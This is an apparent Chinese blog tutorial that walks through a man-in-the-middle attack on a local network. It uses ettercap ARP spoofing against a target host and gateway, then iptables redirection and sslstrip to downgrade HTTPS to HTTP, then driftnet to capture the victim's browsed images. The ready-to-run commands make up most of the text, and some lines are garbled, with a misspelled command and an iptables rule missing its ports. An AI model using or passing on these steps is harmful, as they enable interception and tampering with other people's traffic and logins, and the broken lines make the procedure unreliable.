ettercap的中间人欺骗+sslstrip过滤掉https协议
环境准备:kali系统
因为kali系统自带ettercap,比较方便, 不需要安装
ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1
查找局域网所有主机
通过netdiscover获取到当前目标IP:172.16.42.131
启动ettercap
启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)
ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//
过滤https协议成http
重新打开一个命令行窗口,分别执行下面三个命令行,
echo 1 > /proc/sys/net/ipv4/ip_forward 开启数据重定向
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000 开启80端口的数据转发到10000端口
sslstrip -l 10000 执行sslstrip欺骗,把网页中的https协议转换为http协议
echo > /proc/sys/net/ipv4/ip_forward
iptalbes -t nat -F //清除类型为nat的iptables
iptables -t nat -A PREROUTING -p tcp --destination-port -j REDIRECT --to-ports
sslstrip -l 10000
iptables -t nat -L //查看iptables列表是否生效
当用户浏览的网页中包含https协议,会被转化为http协议的请求
但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了
如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开
获取所有的图片信息
执行arp欺骗以后, 目标机器所有的流量都会走我们的主机, 通过监听wlan0网卡, 我们可以获取和篡改目标机器的所有http请求数据和内容
启动driftnet监听wlan0端口, 查看所有的浏览图片数据, 所有的浏览图片,尽收眼底:
driftnet -i wlan0
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
最新文章
- linux下重启服务命令
- Markdown常用语法
- Thread系列之Thread.Sleep(0)
- iOS-Objective-C内存管理
- 005商城项目:ssm框架的整合成功之后的问题:使用maven的tomcat插件时的debug
- smartjs - DataManager 场景示例分析 - 数据懒加载
- HDU 4614 Vases and Flowers(线段树+二分)
- 互联网产品设计常用文档类型-BRD、MRD、PRD、FSD (
- 八、android jni 之C语言基础
- iOS: 关于Certificate、Provisioning Profile、App ID的介绍及其之间的关系
- 在浏览器中就可以写F#程序了,你试试吧
- 2013 吉林通化邀请赛 Tutor 有点坑的水题
- Windows Server 2003下配置IIS6.0+php5+MySql5+PHPMyAdmin环境
- HTML 学习笔记 JQuery(表单,表格 操作)
- 20145237 实验五《Java网络编程》
- [c#.net]未能加载文件或程序集“”或它的某一个依赖项。系统找不到指定的文件
- VS2015工具箱不出现ArcGIS Windows Forms怎么办?
- No goals have been specified for this build. You must specify a valid lifecycle phase or a goal in the format <;plugin-prefix>;:<;goal>; or <;plugin-group-id>;:<;plugin-artifact-id>;[:<;plugin-version>;]:<;goal
- 解题:NOI 2012 骑行川藏
- IE下常见兼容性问题总结
热门文章
- Connections between cities
- 初入红尘——在安联IT实习的一点感受(未完......)
- ASP.NET Core的身份认证框架IdentityServer4(3)-术语的解释
- C# group 子句
- android版火狐调试器
- vue.js项目安装
- Python 面向对象基础知识
- python 小白(无编程基础,无计算机基础)的开发之路 辅助知识1 with...as
- Vue浅谈
- Hibernate从零开始的反向工程